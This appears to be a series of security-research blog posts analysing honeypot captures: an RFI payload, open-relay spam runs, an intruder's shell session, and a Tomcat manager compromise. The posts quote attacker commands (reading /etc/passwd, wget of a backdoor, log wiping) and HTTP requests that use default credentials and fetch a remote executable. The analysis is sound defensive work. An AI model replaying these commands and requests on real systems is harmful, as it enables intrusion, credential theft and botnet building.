So, we downloaded the URL that they tried to include:

RFI exploit

Pretty easy to spot that it’s BASE64 encoded. The decoded contents will be passed to eval() which then executes the code. Let’s take a look at the decoded exploit:

So, there’s still a small portion that is BASE64 encoded, but let’s see what the other parts do. You can see the script building a few string based on data it can get from the PHP environment, like the hostname of the server and whether the safe mode is on. It’ll will then send the data onwards to somewhere. The recipient address is still encoded and after decoding we can see that the recipient is:

fr33sh3ll@gmail.com

So, when ever the automated scripts the attacker is using successfully exploits a RFI vulnerable site the attacker will get an e-mail showing the vulnerable site and URL. That way he/she can later on pick a server from the e-mails and do about anything he/she wants.

There are several ways to make such attacks much harder to perform, like turning on the safe mode or toggling on the allow_url_fopen or allow_url_include (in some versions of php). More good/better tricks can be found for example on these two sites:

http://www.madirish.net/?article=229

http://www.hardened-php.net/

So, what are the numbers?

We took in 309202 spam messages that were meant for 3814594 receivers. So basically we managed to stop 3.8M spams during the research. Out of 3.8M recipients 3.5M had e-mail address under the .tw ccTLD.

Below a few samples of the stuff that was spamvertized:

It seems that the Video CD’s (VCD) are a pretty popular spam topic. We did not observe any pillpushing spams selling viagra or spams selling replica watches during the whole week.

OUT:       220 <removed> SMTP server ready to serve.
IN :       HELO <removed>
OUT:       250 <removed> Hello <removed>, pleased to meet you.
IN :       MAIL FROM:<k6u5f3s2k5@yahoo.com>
OUT:       250 OK
IN :       RCPT TO:<sseenndd1201@yahoo.com.hk>
OUT:       250 User not local; will forward
IN :       DATA
OUT:       354 Start mail input; end with <CRLF>.<CRLF>
IN :       Subject: Super webscan open relay check succeded, hostname = <removed>
IN :       .
OUT:       250 OK
IN :       QUIT

Since the spammers don’t start sending the spam through the SMTP server before they’ve successfully sent and received the above kind of testmail we decided to forward that one particular piece of mail ourselves. After we sent the mail, basically letting the spammer know that he has found a new open relay it took only 10 minutes for the spam to start rolling in.

Interestingly enough, great majority of the targets are in Taiwan. This could be due to us stumbling into the operations of a spammer who targets a small geolocation. But anyway, here are some numbers from the first 3 hours when the spam started flowing in:

In all, we received 1008 incoming spam messages that had 12877 recipients. So in average a single piece of spam mail had about 13 receivers. Out of the 1008 mails we extracted 990 unique URLs, leading to either the spamvertized site itself or into a picture displayed in the message body.

From the 990 unique URLs we found 878 unique DNS RRs (Resource Records)

All the spam messages we captured were written in chinese. Just out of interest we decided to visit one of the URLs to see what the spam was actually about. Was it Viagra? or Mortage spam? or for “Quality Replicas”? This is what we found:

So, Video CD’s… What could they contain so precious that someone wants to spam their existence to the millions? Could it be movies, not in theaters yet? We tossed the site into Google Translate and here are the results:

“Genuine boxed VCD attached 12 teaching manual”

Teaching manuals!? In case Google made an error, we translated the content list also:

VCD1. Received the court summons, notices, judgments, etc. The first time, how to deal with?
VCD2. Improper financial management刷爆cards, and owe to be debt, card slave how to do?
VCD3. Civil unions should pay attention to, it will have to do? Owe not yet been fraud, how to recover the money was owed?
VCD4. On housing transactions, leasing matters Particular attention should be paid, they can not get the rent or a tenant refusing to move out, how to do?
VCD5. Relating to marriage, divorce, adoption, unclaimed, custody, alimony should pay attention to?
VCD6. Related to cases involved in an accident the attention vehicle damage insurance claims, injury claims
VCD7. On the identity card (original copy) used by Notes? Related instruments (promissory notes, checks) of the relevant laws, lost applications, Movements, invasion and occupation?
VCD8. What circumstances a lawyer must be the best? Resolve their legal problems in three steps
VCD9. Bureau of Investigation by the police or interviews, the transcripts for which we should pay attention right?
VCD10. Books on various reconciliation, cut knot book, undertaking contract, agreement, letter of the law?
VCD11. Husband and wife quarrel, family disputes or domestic violence should be how to deal with?
VCD12. Relating to a variety of writing a will, inheritance of the relevant laws? How to make the best use of the township, the city of the functions of the mediation?

We can’t help but wonder how many buy teaching VCDs that have been spamvertized. We’ll continue tracking the honeypot and post updates at some point.

We had to wait for a few hours for an attacker to arrive into the system. Below is a log of the commands he issued. We sanitized a few IP addresses and URLs for safety reasons.

w
cat /etc/passwd
cat /proc/cpuinfo
ls
wget <poistettu>.com/i[BS]sirsky/bkd
tar xzvf bkd
cd ./–/
./inst
ls
mv zap /bin
cd ..
rm -rf bkd
rm -rf ./–/
ls
w
zap <ip.ip.ip.ip>.d
w
ls
ls
cat /etc/hosts
w
ls
ls -a
wget <poistettu>.com/sirsky/code.tgz
tar xzvf code.jpg
[U-ARROW][BS][BS][BS]tgz
cd .n
./start da[BS][BS]adware
cd ..
rm -rf code.tgz
w

Judging by the typoes in some of the commands there was a real user at the other end rather than an automated program. Also take note of the constant checking of ‘w’-command (who, shows all logged in users). We quess that had the attacker spotted someone else logged in the system they would have aborted the attack.

After first entering the system the attacker checked the list of users configured into the system from the /etc/passwd after which they dug up processor information from /proc/cpuinfo. Next, the attacker downloaded a file called ‘bkd’ from an external URL. More on that file below.

After the attacker installed the ‘bkd’ package he deleted the sourcecodes. In addition, he used a binary called ‘zap’ to delete all logentries that had the IP he used in them.

Next, he checked the /etc/hosts file apparently in an attempt to see whether it would have revealed any other computers in the LAN that he could have attacked using the honeypot as a jumpgate.

Next, he downloaded an another package from the same site, this time the file was called code.tgz, and we will get to the contents later on. Again, after installation and activation the attacker removed all source codes from the system. At this point we decided to pull the plug on the attack and disconnected the machine to wait for further examination.

Now to the downloaded packages. The package that the intruder downloaded first, ‘bkd’, is a backdoored version of openSSH. The attacker had modified and added some code routines so that every time an user logs on to the compromised system their username, password and IP address is sent to the attacker via email. This allows the attacker to further compromise other systems. Furthermore, the backdoor in the downloaded openSSH allows the attacker to gain root access even if the root password is changed.

The other package that was downloaded and installed was a slightly modified copy of an IRC bot known as EnergyMech. With it the attacker can easily execute commands remotely in the compromised system without having to log onto the machine. The bot was set up to join a specific channel in a public IRC network, and when visited we spotted around 12 compromised machines in the botnet-to-be. We issued abuse mails to proper ISPs to get them cleaned.

We also managed to backtrack the attacker to a certain town in Romania. We also found other kinds of data that helped locate the name of the attacker as well as other data and all of it will be sent to Romanian law enforcement. Unfortunately not all attacks  are as easily backtracked as this was.

We intend to write more entries to the Intruders category and we aim to display a variety of attacks similar to the above.

The number of exploitable machines and services in the internet is really dazzling and easily counted in tens, if not hundreds, of millions. Some of the attacks aim to spread a piece of malware while others might be going for a spam cannon. All the entries in this category aim to expose what happens after the actual compromisation of the machine.

All the data will be gathered from live systems, solely set up for this purpose and constantly monitored. This allows us to pull the plug in time to prevent our systems being used to further compromise other machines.

Fri Mar 25 00:30:31 EET 2009 – /190.210.x.x:3625 -

GET /manager/html HTTP/1.1
Referer: http://x.x.x.x:8080/manager/html
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE 3.01)
Host: x.x.x.x:8080
Connection: Close
Cache-Control: no-cache
Authorization: Basic YWRtaW46YWRtaW4=

So, pretty obviously someone is scanning for Tomcat installations that have the manager application installed and using admin:admin as credentials. Instead of fiddling with low interaction honeypots we set up a live Tomcat installation with the above credentials and put a machine between the Tomcat and the router to run a tcpdump. After a day of waiting and watching an attacker came by:

190.26.x.x – admin [26/Mar/2009:21:32:13 -0000] “GET /manager/html HTTP/1.1″ 200 8714
190.26.x.x – admin [26/Mar/2009:21:32:13 -0000] “POST /manager/html/upload HTTP/1.0″ 200 8747
190.26.x.x – - [26/Mar/2009:21:32:15 -0000] “GET /killfexcepshell/index.jsp HTTP/1.1″ 404 763
190.26.x.x – admin [26/Mar/2009:21:32:38 -0000] “POST /manager/html/upload HTTP/1.0″ 200 9377
190.26.x.x – - [26/Mar/2009:21:32:43 -0000] “GET /killfexcepshell/index.jsp HTTP/1.1″ 200 48

As we can see, after probing the honeypot and seeing that it has a Tomcat server with weak passwords it uploads something:

POST /manager/html/upload HTTP/1.0
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=—————————032509203251046
Content-Length: 2495
Host: x.x.x.x:8080
Accept: text/html, */*
Accept-Language: zh-cn
Referer: http://x.x.x.x:8080/manager/html
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Authorization: Basic YWRtaW46YWRtaW4=
—————————–032509203251046
Content-Disposition: form-data; name=”deployWar”; filename=”C:\WINDOWS\system32\mui\fexcep\killfexcepshell.war”
Content-Type: application/x-zip-compressed

And what does the WAR contain? This:

As we can see from the POST, the infection is most likely coming from a Windows OS. Something that struck my eye was that even though the IP address is in Colombia the malware uses “Accept-Language: zh-cn” which basically suggests Chinese origin for the malware. Another interesting point is that the attacker downloaded the GIF image files that appear in the admin panel. That suggests it’s not a custom bot and propably more likely something that is running a hidden Internet Explorer window. But let’s check the rest.

Once it has succesfully uploaded, what does it do? It does only one request any: GET /killfexcepshell/index.jsp and after that nada.

So let’s take a closer look of the last request:

GET /killfexcepshell/index.jsp HTTP/1.1
Referer: http://x.x.x.x:8080/killfexcepshell/index.jsp
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; IE 7)
Host: x.x.x.x:8080
Connection: Close
Cache-Control: no-cache
Cache-Vip-Url:http://www.<hidden>.cn/tomcat.exe

And the last response:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=26482330DBFE986AC0705B4691E0C66D; Path=/killfexcepshell
Content-Type: text/html;charset=utf-8
Content-Length: 48
Date: Thu, 26 Mar 2009 01:32:43 GMT
Connection: close

Failure!Because Remote computer system is Linux!

Umm, Cache-Vip-URL? Pointing to an executable in China? Must be Very Important indeed. Let’s take a look at what index.jsp does. (not necessarily in this order though.):

• It rewrites tomcat-users.xml to contain following:

<?xml version=’1.0′ encoding=’utf-8′?>
<tomcat-users>
<role rolename=”tomcat”/>
<role rolename=”role1″ />
<role rolename=”manager”/>
<role rolename=”admin”/>
<user username=”admin” password=”<hidden>” roles=”admin,manager”/>
</tomcat-users>

Yes true, it cripples the administration capabilities from Tomcat.

• Downloads a file. It fetches the URL-parameter from the Cache-Vip-URL. And after downloading it tries to execute but as you can see from the response it fails since our honeypot was linux.

We have hidden the password from the snippet above since the authors have bug in their package. They’re supposed to generate a random password for each infected Tomcat but someone had a brainfart during the coding and the generation is not working so the password is static.

The binary that gets downloaded if the Tomcat server is running on Windows is a malware variant commonly going under the name PcClient. So basically a remote administration tool that connects to the C&C at <hidden>.vicp.net, tcp port 126.

This is a good example of the blackhats trying to find any ways to wriggle into computers. Tomcat is not really too common to run into and Tomcat has not had default credentials for the manager application in past several years. Still, that vector is actively being scanned for a free passage into computers.